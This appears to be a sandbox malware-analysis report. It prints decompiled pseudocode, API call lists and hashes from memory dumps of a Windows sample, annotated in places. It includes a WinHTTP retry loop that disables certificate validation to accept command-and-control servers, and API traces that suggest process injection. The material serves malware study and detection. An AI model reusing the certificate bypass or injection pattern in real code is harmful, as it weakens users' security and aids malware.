                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: String$Free$Alloc
                              • String ID:
                              • API String ID: 986138563-0
                              • Opcode ID: a42d7bd266889de61350bdb4ef7cea0428776fd26188b8dbcfb9ab0c3be34ddb
                              • Instruction ID: faabe891db798ea9c05af6fa9f3952a8597b88b4488f48eee230a7f774c61cb5
                              • Opcode Fuzzy Hash: a42d7bd266889de61350bdb4ef7cea0428776fd26188b8dbcfb9ab0c3be34ddb
                              • Instruction Fuzzy Hash: FD014F7290031ABFDB219F69D808D9FBBFDEF44314B014021EA05A61A0D770DA198BA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013EA415(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
                              				void* _t24;
                              				signed short _t25;
                              				signed int _t27;
                              				intOrPtr* _t28;
                              				signed short _t29;
                              
                              				_t28 = __edi;
                              				if(_a4 == 0) {
                              					L2:
                              					_t29 = E013E5607(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                              					if(_t29 == 0) {
                              						_t27 = _a12 >> 1;
                              						if(_t27 == 0) {
                              							_t29 = 2;
                              							HeapFree( *0x13ed270, 0, _a4);
                              						} else {
                              							_t24 = _a4;
                              							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
                              							 *_t28 = _t24;
                              						}
                              					}
                              					L6:
                              					return _t29;
                              				}
                              				_t25 = E013E3196(_a4, _a8, _a12, __edi); // executed
                              				_t29 = _t25;
                              				if(_t29 == 0) {
                              					goto L6;
                              				}
                              				goto L2;
                              			}

                              APIs
                                • Part of subcall function 013E3196: SysFreeString.OLEAUT32(00000000), ref: 013E31FC
                              • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,747DF710,?,00000000,?,00000000,?,013E4C93,?,004F0053,03AD93B8,00000000,?), ref: 013EA476
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Free$HeapString
                              • String ID: Uxt
                              • API String ID: 3806048269-1536154274
                              • Opcode ID: 9ea123522ede6ec615d180a4fbfabf81e2d808af052a40e663e6f19ea717ffe2
                              • Instruction ID: 02dd008acf274617023d087990282ce49c609eb93cff1ec28cd01a67c16e8339
                              • Opcode Fuzzy Hash: 9ea123522ede6ec615d180a4fbfabf81e2d808af052a40e663e6f19ea717ffe2
                              • Instruction Fuzzy Hash: 9B012832000269BBCB229F48CC09FEA3FA9FB04795F058019FE056A2A0C731D920DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 37%
                              			E013E40AC(void* __ecx) {
                              				signed int _v8;
                              				signed int _t10;
                              				void* _t15;
                              				void* _t19;
                              				void* _t20;
                              				void* _t22;
                              				intOrPtr* _t23;

                              				// __imp__ resolves to GetComputerNameExA (see the APIs list below).
                              				// Classic two-call pattern: first call with a NULL buffer only fills in the
                              				// required size (_v8), then the buffer is allocated and the name fetched.
                              				_t23 = __imp__;
                              				_t20 = 0;
                              				_v8 = _v8 & 0;
                              				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                              				_t10 = _v8;
                              				if(_v8 != 0) {
                              					_t20 = E013E55DC(_t10 + 1); // heap allocation (RtlAllocateHeap), one extra byte for the terminator
                              					if(_t20 != 0) {
                              						_t15 =  *_t23(3, _t20,  &_v8); // executed
                              						if(_t15 != 0) {
                              							 *((char*)(_v8 + _t20)) = 0; // NUL-terminate
                              						} else {
                              							E013E6DFA(_t20); // free on failure (RtlFreeHeap)
                              							_t20 = 0;
                              						}
                              					}
                              				}
                              				return _t20; // heap string holding the computer name, or NULL
                              			}

                              APIs
                              • GetComputerNameExA.KERNELBASE(00000003,00000000,013E63F4,770CC740,00000000,?,?,013E63F4), ref: 013E40C4
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • GetComputerNameExA.KERNELBASE(00000003,00000000,013E63F4,013E63F5,?,?,013E63F4), ref: 013E40E1
                                • Part of subcall function 013E6DFA: RtlFreeHeap.NTDLL(00000000,00000000,013E55CD,00000000,?,?,00000000), ref: 013E6E06
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: ComputerHeapName$AllocateFree
                              • String ID:
                              • API String ID: 187446995-0
                              • Opcode ID: 2ddd2545f6737358fd1f63454693658b35c70d4ce26be3cedcb1beef27b97203
                              • Instruction ID: a7fc86d707a0b62c103d6bd737e06f1184c177c13f49b9437e7394f0a88f1973
                              • Opcode Fuzzy Hash: 2ddd2545f6737358fd1f63454693658b35c70d4ce26be3cedcb1beef27b97203
                              • Instruction Fuzzy Hash: 43F03667A00319AAE711D65D8C04E9F7AEDDBC5654F150075A515E7180DA70DE068760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlEnterCriticalSection.NTDLL(01050460), ref: 01043BEB
                              • RtlLeaveCriticalSection.NTDLL(01050460), ref: 01043C27
                                • Part of subcall function 01034CC6: lstrlen.KERNEL32(0104F4B4,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034D13
                                • Part of subcall function 01034CC6: VirtualProtect.KERNELBASE(00000000,00000000,00000040,-00000020,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034D25
                                • Part of subcall function 01034CC6: lstrcpy.KERNEL32(00000000,0104F4B4), ref: 01034D34
                                • Part of subcall function 01034CC6: VirtualProtect.KERNELBASE(00000000,00000000,?,-00000020,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034D45
                                • Part of subcall function 010469F0: RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                              • String ID:
                              • API String ID: 1872894792-0
                              • Opcode ID: c923e6fab999a3e14a2095edb066202aa0ac9c1844bbcf301c024cd5c642dd3d
                              • Instruction ID: 9de2ccb72d1912d3ab2a884572c8276f7d55a2b99e6090198b72a2c405568de0
                              • Opcode Fuzzy Hash: c923e6fab999a3e14a2095edb066202aa0ac9c1844bbcf301c024cd5c642dd3d
                              • Instruction Fuzzy Hash: A1F0A7FA7012199B87A06F5999C487BFFACFB49311301019EFDC597304DE635C018B90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 010343EF: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 01034428
                                • Part of subcall function 010343EF: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 0103445E
                                • Part of subcall function 010343EF: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0103446A
                                • Part of subcall function 010343EF: lstrcmpi.KERNEL32(?,00000000), ref: 010344A7
                                • Part of subcall function 010343EF: StrChrA.SHLWAPI(?,0000002E), ref: 010344B0
                                • Part of subcall function 010343EF: lstrcmpi.KERNEL32(?,00000000), ref: 010344C2
                                • Part of subcall function 010343EF: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 01034513
                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000010,?,?,?,0104C5B8,0000002C,0103656E,04B38DBA,?,00000000,0102EAB2), ref: 01043518
                                • Part of subcall function 01031635: GetProcAddress.KERNEL32(?,00000000), ref: 0103165E
                                • Part of subcall function 01031635: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,0104684F,00000000,00000000,00000028,00000100), ref: 01031680
                              • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,0104C5B8,0000002C,0103656E,04B38DBA,?,00000000,0102EAB2,?,00000318), ref: 010435A3
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                              • String ID:
                              • API String ID: 4138075514-0
                              • Opcode ID: 60bced59846de817fcc65201e7cb83255ce430018866d7a2aa061c164909f958
                              • Instruction ID: 5769a93ae1363402c619752187781ac560393827c67c7d899e9da494518780c2
                              • Opcode Fuzzy Hash: 60bced59846de817fcc65201e7cb83255ce430018866d7a2aa061c164909f958
                              • Instruction Fuzzy Hash: B42104B5D01229EBCF519FA5D884ACEBBB4BF08720F10812AF954BA150C3345A40CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 32%
                              			E013E8F5E(intOrPtr _a4, signed int _a8) {
                              				long _v8;
                              				long _v12;
                              				char _v16;
                              				void* _t14;
                              				long _t15;
                              				char* _t17;
                              				intOrPtr* _t19;
                              				signed int _t22;

                              				// The imported function is called with seven arguments and its failures are
                              				// handled with WinHTTP error codes, so this is a request-send loop:
                              				// 0x2f00 = ERROR_WINHTTP_RESEND_REQUEST, 0x2f8f = ERROR_WINHTTP_SECURE_FAILURE.
                              				_t19 = __imp__; // 0x703be700
                              				_t22 =  ~_a8;
                              				_v12 = 0; // set once the security flags have been relaxed, so it is only tried once
                              				asm("sbb esi, esi");
                              				while(1) {
                              					_v8 = 0;
                              					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
                              					if(_t14 != 0) {
                              						break;
                              					}
                              					_t15 = GetLastError();
                              					_v8 = _t15;
                              					if(_t15 != 0x2f8f) {
                              						if(_t15 == 0x2f00) {
                              							continue; // server asked for a resend: retry as is
                              						}
                              					} else {
                              						// On a TLS failure, set option 0x1f (WINHTTP_OPTION_SECURITY_FLAGS) to 0x3300,
                              						// i.e. SECURITY_FLAG_IGNORE_UNKNOWN_CA | IGNORE_CERT_DATE_INVALID |
                              						// IGNORE_CERT_CN_INVALID | IGNORE_CERT_WRONG_USAGE, then retry: certificate
                              						// validation is disabled, which is why self-signed C2 certificates are accepted.
                              						_v16 = 0x3300;
                              						if(_v12 == 0) {
                              							_t17 =  &_v16;
                              							__imp__(_a4, 0x1f, _t17, 4);
                              							if(_t17 == 0) {
                              								_v8 = GetLastError();
                              							} else {
                              								_v12 = 1;
                              								continue;
                              							}
                              						}
                              					}
                              					L9:
                              					return _v8; // 0 on success, otherwise the last Win32 error
                              				}
                              				goto L9;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: e901eaf1fd823d2bbfad1d7e8d49116758d16729c9132d15fd21bbe12f7ea233
                              • Instruction ID: 57baf231941a8d5238916263b8ac69d34ad94c54ecac83f3c0903d71372ac9b0
                              • Opcode Fuzzy Hash: e901eaf1fd823d2bbfad1d7e8d49116758d16729c9132d15fd21bbe12f7ea233
                              • Instruction Fuzzy Hash: 4A011231D00318FBDF219F99D84899EBFFDEB45754F108066EA01D61C1C7708A49CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleA.KERNEL32(?), ref: 0102B1EF
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: 5742511a4760f35281228d0fa6da871448b4fabe9807b8cf4918b9fde907103b
                              • Instruction ID: e2abfa5f2760e4aa6346a04474cce7d898b95b999372ff080500f448a2a4b042
                              • Opcode Fuzzy Hash: 5742511a4760f35281228d0fa6da871448b4fabe9807b8cf4918b9fde907103b
                              • Instruction Fuzzy Hash: 883190B6A00325EFCB61DF8CD48099EBBF4FB46310F1540AAE684EB215D630AD04CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 92%
                              			E013E78A8(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
                              				signed int _v5;
                              				signed int _v12;
                              				void* _t32;
                              				signed int _t37;
                              				signed int _t39;
                              				signed char _t45;
                              				void* _t49;
                              				char* _t51;
                              				signed int _t65;
                              				signed int _t66;
                              				signed int _t69;

                              				// Formats __eax bytes from _a4 as a comma-separated list of decimal numbers
                              				// (e.g. 192,168,0,1). Output buffer is returned via _a8, its length via _a12;
                              				// at most 4 characters per byte ("255,"), hence the __eax << 2 allocation.
                              				_v12 = _v12 & 0x00000000;
                              				_t69 = __eax;
                              				_t32 = RtlAllocateHeap( *0x13ed270, 0, __eax << 2); // executed
                              				_t49 = _t32;
                              				if(_t49 == 0) {
                              					_v12 = 8; // ERROR_NOT_ENOUGH_MEMORY
                              				} else {
                              					 *_a8 = _t49;
                              					do {
                              						_t45 =  *_a4;
                              						asm("cdq");
                              						_t65 = 0x64;
                              						_t37 = (_t45 & 0x000000ff) / _t65; // hundreds digit
                              						_v5 = _t37;
                              						if(_t37 != 0) {
                              							 *_t49 = _t37 + 0x30;
                              							_t49 = _t49 + 1;
                              							_t45 = _t45 + _t37 * 0x9c; // 0x9c == -100 in 8 bits: subtract hundreds
                              						}
                              						asm("cdq");
                              						_t66 = 0xa;
                              						_t39 = (_t45 & 0x000000ff) / _t66; // tens digit
                              						if(_t39 != 0 || _v5 != _t39) { // emit a '0' tens digit only after a hundreds digit
                              							 *_t49 = _t39 + 0x30;
                              							_t49 = _t49 + 1;
                              							_t45 = _t45 + _t39 * 0xf6; // 0xf6 == -10 in 8 bits: subtract tens
                              						}
                              						_a4 = _a4 + 1;
                              						 *_t49 = _t45 + 0x30; // units digit
                              						 *(_t49 + 1) = 0x2c; // ','
                              						_t49 = _t49 + 2;
                              						_t69 = _t69 - 1;
                              					} while (_t69 != 0);
                              					_t51 = _t49 - 1; // drop the trailing comma
                              					 *_a12 = _t51 -  *_a8;
                              					 *_t51 = 0;
                              				}
                              				return _v12;
                              			}

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 013E78C0
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
• Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 69b30e87081916e2b5bbaeee5e04be4d601efe378ab6c75b1f5a080a9429b3ce
                              • Instruction ID: e1ae04c8f0ba43a379eb1f42deb60768c8d22643524049411749b1acc59cd3b0
                              • Opcode Fuzzy Hash: 69b30e87081916e2b5bbaeee5e04be4d601efe378ab6c75b1f5a080a9429b3ce
                              • Instruction Fuzzy Hash: F111E471645344AFEB168F2DC456BE97FA9DF23358F14408AE5808F2D2C277850BC760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleA.KERNEL32(?,00000003,0104F514,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 010435F1
                                • Part of subcall function 01044582: NtQueryInformationProcess.NTDLL(00000000,0102B24B,00000018,00000000,01050460), ref: 01044599
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HandleInformationModuleProcessQuery
                              • String ID:
                              • API String ID: 2776635927-0
                              • Opcode ID: 67d1be2ad6bec687626b9963c1fc3144208cba5569420b39d7897d46e1c42a36
                              • Instruction ID: 34588cb7693228199fc671249c150c94c8d6753d719870d85ba6b7719383c83c
                              • Opcode Fuzzy Hash: 67d1be2ad6bec687626b9963c1fc3144208cba5569420b39d7897d46e1c42a36
                              • Instruction Fuzzy Hash: 0121A2B5200216AFEB60DF5DD5C096A7BE8FF4829071494B9EAD9CF350DB31E900CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01021444
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: e3b5680f6405e22f27ceebe9d16393180b54eb4b46887e64efabc7e85a419bc4
                              • Instruction ID: d749e8f5d563588f9fba6055e834915d99f2b97e1d29036830ed4eecf07acdbf
                              • Opcode Fuzzy Hash: e3b5680f6405e22f27ceebe9d16393180b54eb4b46887e64efabc7e85a419bc4
                              • Instruction Fuzzy Hash: 2A115B3260021AAFDF419FA9DC409DE7FA9FF08360B058125FE5C92120CB32C821DFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 34%
                              			E013E3196(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                              				intOrPtr _v12;
                              				void* _v18;
                              				short _v20;
                              				intOrPtr _t15;
                              				short _t17;
                              				intOrPtr _t19;
                              				short _t23;
                              
                              				_t23 = 0;
                              				_v20 = 0;
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosw");
                              				_t15 =  *0x13ed2b8; // 0x26ea5a8
                              				_t4 = _t15 + 0x13ee39c; // 0x3ad8944
                              				_t20 = _t4;
                              				_t6 = _t15 + 0x13ee124; // 0x650047
                              				_t17 = E013E5A5E(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                              				if(_t17 < 0) {
                              					_t23 = _t17;
                              				} else {
                              					if(_v20 != 8) {
                              						_t23 = 1;
                              					} else {
                              						_t19 = E013E6794(_t20, _v12);
                              						if(_t19 == 0) {
                              							_t23 = 8;
                              						} else {
                              							 *_a16 = _t19;
                              						}
                              						__imp__#6(_v12);
                              					}
                              				}
                              				return _t23;
                              			}

                              APIs
                                • Part of subcall function 013E5A5E: SysFreeString.OLEAUT32(?), ref: 013E5B3D
                                • Part of subcall function 013E6794: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,013E3D8B,004F0053,00000000,?), ref: 013E679D
                                • Part of subcall function 013E6794: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,013E3D8B,004F0053,00000000,?), ref: 013E67C7
                                • Part of subcall function 013E6794: memset.NTDLL ref: 013E67DB
                              • SysFreeString.OLEAUT32(00000000), ref: 013E31FC
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
• Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: FreeString$lstrlenmemcpymemset
                              • String ID:
                              • API String ID: 397948122-0
                              • Opcode ID: 5a7f5c14cf80541989e19cea7c5f2ef0134c92565de1390536d708c570ccb16d
                              • Instruction ID: 6af30a2939fe34fe6dac46d253f5f624ebfa151a3a173c29bba993c9a5f2d319
                              • Opcode Fuzzy Hash: 5a7f5c14cf80541989e19cea7c5f2ef0134c92565de1390536d708c570ccb16d
                              • Instruction Fuzzy Hash: 55014C32500229BBDB21AF98CC09DAEBBF8FB04618F004525EA51E71A1E771A959CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 01039288: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,010501F4,00000000,0102B176,?,0102145C,?), ref: 010392A7
                                • Part of subcall function 01039288: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,010501F4,00000000,0102B176,?,0102145C,?), ref: 010392B2
                                • Part of subcall function 01039288: _wcsupr.NTDLL ref: 010392BF
                                • Part of subcall function 01039288: lstrlenW.KERNEL32(00000000), ref: 010392C7
                              • ResumeThread.KERNEL32(00000004,?,0102145C,?), ref: 0102B184
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                              • String ID:
                              • API String ID: 3646851950-0
                              • Opcode ID: 32cdf4025621ef73f049443cf6185f995bfa3dc13b1278b59a4d450920012bfc
                              • Instruction ID: a2ee103b1395ee208b91d9b2f3b075b48ae5f011a009de89d21a0cc1dffc0fe3
                              • Opcode Fuzzy Hash: 32cdf4025621ef73f049443cf6185f995bfa3dc13b1278b59a4d450920012bfc
                              • Instruction Fuzzy Hash: 6AD0A734204751E7DB621715CF45B4BBFD6AF90B84F54C81CFDC945066C77284149615
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • ___delayLoadHelper2@8.DELAYIMP ref: 01048560
                                • Part of subcall function 010486A9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,0002C5B4,01020000), ref: 01048722
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ExceptionHelper2@8LoadRaise___delay
                              • String ID:
                              • API String ID: 123106877-0
                              • Opcode ID: 839859ee11d2c4892b2a83cb1ec9d730111ba91c9e47f00fe25fc7d4f4904879
                              • Instruction ID: d791a01ab1f08a8558d695032ff064d83bee9415b7618da763719a5dccc4e1ea
                              • Opcode Fuzzy Hash: 839859ee11d2c4892b2a83cb1ec9d730111ba91c9e47f00fe25fc7d4f4904879
                              • Instruction Fuzzy Hash: 24A001D62EA2427E364966D66E9AC7F621CC4E5A22330CD3FB592A8048A990198911B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • ___delayLoadHelper2@8.DELAYIMP ref: 01048560
                                • Part of subcall function 010486A9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,0002C5B4,01020000), ref: 01048722
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ExceptionHelper2@8LoadRaise___delay
                              • String ID:
                              • API String ID: 123106877-0
                              • Opcode ID: 2282b859dc54adb2ee72023ef21e1b619e154e980f975a32e130775c59e6cde3
                              • Instruction ID: 04d205fc175392ea53b367fd885099d61709d38d62cae9822a1ea43aa78108a8
                              • Opcode Fuzzy Hash: 2282b859dc54adb2ee72023ef21e1b619e154e980f975a32e130775c59e6cde3
                              • Instruction Fuzzy Hash: F0A001D62AA243BE364966D66E96C7F621CC4E9A61330CD3FA492A8048A990188511B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FreeHeap
                              • String ID:
                              • API String ID: 3298025750-0
                              • Opcode ID: d43851c99458bdf4af7783714d675d0c63765bad1ecb7f979907f4eb8d03bd64
                              • Instruction ID: ccb32bf483304451fdaba24b511156e130062b015603168552a72332fb74e669
                              • Opcode Fuzzy Hash: d43851c99458bdf4af7783714d675d0c63765bad1ecb7f979907f4eb8d03bd64
                              • Instruction Fuzzy Hash: 41B012B9240300EBCB614B00DF04F0E7A22A750700F004010B3890007C863B0430EB05
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 082e565fb288035cc93058932922e72d4d3a9fadc2a8a2c0be9bccd667aa3a63
                              • Instruction ID: 4c3e09776b80d09a1088712a3469ab7930d39022e69c189967cff01744ccdd3d
                              • Opcode Fuzzy Hash: 082e565fb288035cc93058932922e72d4d3a9fadc2a8a2c0be9bccd667aa3a63
                              • Instruction Fuzzy Hash: A1B01279540300FBCB618B00DE04F0E7B62A750700F008010B2860007C83371420EF15
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013E55DC(long _a4) {
                              				void* _t2;
                              
                              				_t2 = RtlAllocateHeap( *0x13ed270, 0, _a4); // executed
                              				return _t2;
                              			}

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
• Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 35d5be9239ced87ef527b3b52193639b1eb283611920feab757136087bcc152e
                              • Instruction ID: b22b0727ea6b98527419b54a80f2477fc4b660a112271d38ab298500af2ad7b6
                              • Opcode Fuzzy Hash: 35d5be9239ced87ef527b3b52193639b1eb283611920feab757136087bcc152e
                              • Instruction Fuzzy Hash: 05B012B1100300ABCE314B90DF04F097FB5B750710F005011F3040C0E8C2319820EB04
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013E2363(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
                              				void* _v8;
                              				int _v12;
                              				char _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				char _v32;
                              				char _v144;
                              				int _v148;
                              				intOrPtr _v152;
                              				intOrPtr _v156;
                              				intOrPtr _v160;
                              				char _v164;
                              				void* _t37;
                              				void* _t42;
                              				void* _t51;
                              				int _t53;
                              				void* _t60;
                              				void* _t63;
                              				void* _t64;
                              
                              				_t53 = 0;
                              				_t60 = __ecx;
                              				_v16 = 0;
                              				_v12 = 0;
                              				_v8 = 0;
                              				if(__ecx <= 0x80 ||  *__eax != 0x400) {
                              					L21:
                              					return _t53;
                              				} else {
                              					_t58 =  &_v164;
                              					_t37 = E013EA483(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
                              					if(_t37 != 0) {
                              						goto L21;
                              					}
                              					_t61 = _t60 - 0x80;
                              					if(_v148 > _t60 - 0x80) {
                              						goto L21;
                              					}
                              					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
                              						_t37 = _t37 + 1;
                              						if(_t37 < 0x10) {
                              							continue;
                              						}
                              						_t53 = _v148;
                              						_t51 = E013E55DC(_t53);
                              						_t73 = _t51;
                              						_v8 = _t51;
                              						if(_t51 != 0) {
                              							_t53 = 0;
                              							L18:
                              							if(_t53 != 0) {
                              								goto L21;
                              							}
                              							L19:
                              							if(_v8 != 0) {
                              								E013E6DFA(_v8);
                              							}
                              							goto L21;
                              						}
                              						memcpy(_t51, _a4, _t53);
                              						L8:
                              						_t63 = _v8;
                              						E013E6B8E(_t58, _t73, _t63, _t53,  &_v32);
                              						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
                              							L15:
                              							_t53 = 0;
                              							goto L19;
                              						} else {
                              							 *_a8 = _t63;
                              							goto L18;
                              						}
                              					}
                              					_t42 = E013E6E7F(_t61, _a4,  &_v8,  &_v12,  &_v144, 0); // executed
                              					__eflags = _t42;
                              					if(_t42 != 0) {
                              						_t53 = _v12;
                              						goto L18;
                              					}
                              					_t53 = _v148;
                              					__eflags = _v12 - _t53;
                              					if(__eflags >= 0) {
                              						goto L8;
                              					}
                              					goto L15;
                              				}
                              			}

                              APIs
                              • memcpy.NTDLL(00000000,?,?,?,?,?,00000001,?,00000001,?), ref: 013E23EA
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
